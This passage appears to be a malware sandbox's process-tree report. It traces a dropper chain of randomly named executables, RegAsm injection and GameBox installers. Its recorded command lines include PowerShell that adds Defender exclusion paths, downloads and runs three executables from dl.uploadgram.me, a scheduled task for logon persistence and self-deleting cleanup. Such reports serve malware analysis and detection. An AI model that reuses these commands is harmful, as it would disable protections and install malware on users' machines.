                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                21⤵
                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                PID:9092
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                  22⤵
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:8616
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    23⤵
                                                                                                                                                                                      PID:5696
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        24⤵
                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                        PID:6436
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                          25⤵
                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                          PID:8844
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                            26⤵
                                                                                                                                                                                              PID:8620
                                                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                            ping GFBFPSXA -n 30
                                                                                                                                                            9⤵
                                                                                                                                                            • Runs ping.exe
                                                                                                                                                            PID:7768
                                                                                                                                                  • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                    "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                    5⤵
                                                                                                                                                      PID:5536
                                                                                                                                                      • C:\Users\Admin\Documents\xddWNGFnZiVnxb7uDiFL_tI1.exe
                                                                                                                                                        "C:\Users\Admin\Documents\xddWNGFnZiVnxb7uDiFL_tI1.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                        PID:6180
                                                                                                                                                      • C:\Users\Admin\Documents\bPmnALIS0He0rKofKkkyXNEu.exe
                                                                                                                                                        "C:\Users\Admin\Documents\bPmnALIS0He0rKofKkkyXNEu.exe"
                                                                                                                                                        6⤵
                                                                                                                                                          PID:6300
                                                                                                                                                          • C:\Users\Admin\Documents\bPmnALIS0He0rKofKkkyXNEu.exe
                                                                                                                                                            "C:\Users\Admin\Documents\bPmnALIS0He0rKofKkkyXNEu.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:8224
                                                                                                                                                        • C:\Users\Admin\Documents\X02gb7jRDSgoNav7MeyGZpdP.exe
                                                                                                                                                          "C:\Users\Admin\Documents\X02gb7jRDSgoNav7MeyGZpdP.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                          PID:5436
                                                                                                                                                        • C:\Users\Admin\Documents\GBZiz6Mcam0RSz4wnu0xHAKJ.exe
                                                                                                                                                          "C:\Users\Admin\Documents\GBZiz6Mcam0RSz4wnu0xHAKJ.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5252
                                                                                                                                                          • C:\Users\Admin\Documents\8ru1mNMpnXcCOn_fZtY5IjHy.exe
                                                                                                                                                            "C:\Users\Admin\Documents\8ru1mNMpnXcCOn_fZtY5IjHy.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5216
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 660
                                                                                                                                                                7⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:7380
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 644
                                                                                                                                                                7⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:5488
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 680
                                                                                                                                                                7⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:5820
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 676
                                                                                                                                                                7⤵
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:7796
                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5216 -s 1176
                                                                                                                                                                7⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                • Program crash
                                                                                                                                                                PID:7120
                                                                                                                                                            • C:\Users\Admin\Documents\RX9e1uA3J_XXwLC0c7rnxMPK.exe
                                                                                                                                                              "C:\Users\Admin\Documents\RX9e1uA3J_XXwLC0c7rnxMPK.exe"
                                                                                                                                                              6⤵
                                                                                                                                                                PID:6268
                                                                                                                                                              • C:\Users\Admin\Documents\_m15UQ3EH7JEwyal6MQvjGN6.exe
                                                                                                                                                                "C:\Users\Admin\Documents\_m15UQ3EH7JEwyal6MQvjGN6.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                PID:4444
                                                                                                                                                              • C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe
                                                                                                                                                                "C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                PID:6244
                                                                                                                                                                • C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe
                                                                                                                                                                  C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:7652
                                                                                                                                                                  • C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe
                                                                                                                                                                    C:\Users\Admin\Documents\TdLZYkzdO0sUOeY9aKo_2y37.exe
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:7848
                                                                                                                                                                  • C:\Users\Admin\Documents\dpE1CsfB8M8DzbuC5GVDQVwj.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\dpE1CsfB8M8DzbuC5GVDQVwj.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:5456
                                                                                                                                                                  • C:\Users\Admin\Documents\Nwk9o6ap0VwbRr6MOCvFQeUX.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\Nwk9o6ap0VwbRr6MOCvFQeUX.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    PID:4416
                                                                                                                                                                  • C:\Users\Admin\Documents\d6CHHdXAhLQ20OozABM_VnF6.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\d6CHHdXAhLQ20OozABM_VnF6.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    PID:5800
                                                                                                                                                                    • C:\Users\Admin\Documents\d6CHHdXAhLQ20OozABM_VnF6.exe
                                                                                                                                                                      C:\Users\Admin\Documents\d6CHHdXAhLQ20OozABM_VnF6.exe
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:7728
                                                                                                                                                                    • C:\Users\Admin\Documents\jyothVzmbNP0BQQFvBxqLytn.exe
                                                                                                                                                                      "C:\Users\Admin\Documents\jyothVzmbNP0BQQFvBxqLytn.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:5724
                                                                                                                                                                      • C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe
                                                                                                                                                                        "C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:7160
                                                                                                                                                                        • C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe
                                                                                                                                                                          C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:7704
                                                                                                                                                                          • C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe
                                                                                                                                                                            C:\Users\Admin\Documents\Rlxm7qsHYj6dnD9GptY7BdIT.exe
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:7896
                                                                                                                                                                          • C:\Users\Admin\Documents\cGzT6abCwtihy6RGHJi3n2YN.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\cGzT6abCwtihy6RGHJi3n2YN.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:7152
                                                                                                                                                                          • C:\Users\Admin\Documents\VaHnygHDy6_qAsKZUTzAOeEC.exe
                                                                                                                                                                            "C:\Users\Admin\Documents\VaHnygHDy6_qAsKZUTzAOeEC.exe"
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:7144
                                                                                                                                                                            • C:\Users\Admin\Documents\C2eQIA77Ty2zjessn8OdfVst.exe
                                                                                                                                                                              "C:\Users\Admin\Documents\C2eQIA77Ty2zjessn8OdfVst.exe"
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:7136
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:8144
                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:5908
                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                        8⤵
                                                                                                                                                                                          PID:5204
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                          8⤵
                                                                                                                                                                                            PID:5664
                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                            8⤵
                                                                                                                                                                                              PID:6976
                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                              8⤵
                                                                                                                                                                                                PID:6476
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                PID:4736
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:2864
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:8264
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:8436
                                                                                                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                          "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                            PID:9012
                                                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                PID:6300
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                  PID:9064
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                    PID:8132
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                      PID:5296
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                        PID:7904
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:3032
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                          PID:5696
                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                              PID:8132
                                                                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                PID:8332
                                                                                                                                                                                                                            • C:\Windows\system32\services32.exe
                                                                                                                                                                                                                              "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                PID:5068
                                                                                                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                  "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                    PID:9020
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                                        PID:6376
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                                                          PID:8024
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                                            PID:1348
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                                                              PID:7212
                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                                                                            PID:9164
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                              PID:9056
                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                                                  PID:7184
                                                                                                                                                                                                                                                  • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                                                    PID:9096
                                                                                                                                                                                                                                                • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                                                                                                                                                                                                                                                  "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                    PID:5284
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                      PID:8380
                                                                                                                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                                          PID:5276
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                    PID:2900
                                                                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                        PID:5664
                                                                                                                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                                                                                                                        13⤵
                                                                                                                                                                                                                                                          PID:4080
                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                  PID:5944
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                    PID:6864
                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                    PID:644
                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:1328
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                        "{path}"
                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                          PID:4908
                                                                                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                                                              PID:9212
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\XwT_v_F69iIQiMuwEEo5AsRp.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\XwT_v_F69iIQiMuwEEo5AsRp.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:7128
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\Ts74QeJVYe6CLRGXd9hzy_7H.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\Ts74QeJVYe6CLRGXd9hzy_7H.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:7120
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\Ts74QeJVYe6CLRGXd9hzy_7H.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\Ts74QeJVYe6CLRGXd9hzy_7H.exe
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:7712
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\4Bt_QUYkJ_CZH4TDOSaeFYOh.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\4Bt_QUYkJ_CZH4TDOSaeFYOh.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\4Bt_QUYkJ_CZH4TDOSaeFYOh.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\4Bt_QUYkJ_CZH4TDOSaeFYOh.exe" -q
                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                PID:5488
                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:5232
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Z4Hfg5OiKMuOe0wqhnkhpwrp.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Z4Hfg5OiKMuOe0wqhnkhpwrp.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:7360
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\6187606.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\6187606.exe"
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                    PID:7136
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8989004.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8989004.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                    PID:6568
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1407714.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1407714.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:6728
                                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\YryBNttyU0jMVCfM1ii4J4uw.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\YryBNttyU0jMVCfM1ii4J4uw.exe"
                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                      PID:1140
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-A1528.tmp\YryBNttyU0jMVCfM1ii4J4uw.tmp
                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-A1528.tmp\YryBNttyU0jMVCfM1ii4J4uw.tmp" /SL5="$2046A,138429,56832,C:\Users\Admin\Documents\YryBNttyU0jMVCfM1ii4J4uw.exe"
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                        PID:5816
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-SQBV4.tmp\Setup.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-SQBV4.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                          PID:8532
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                              PID:8200
                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                              PID:5292
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                  PID:5252
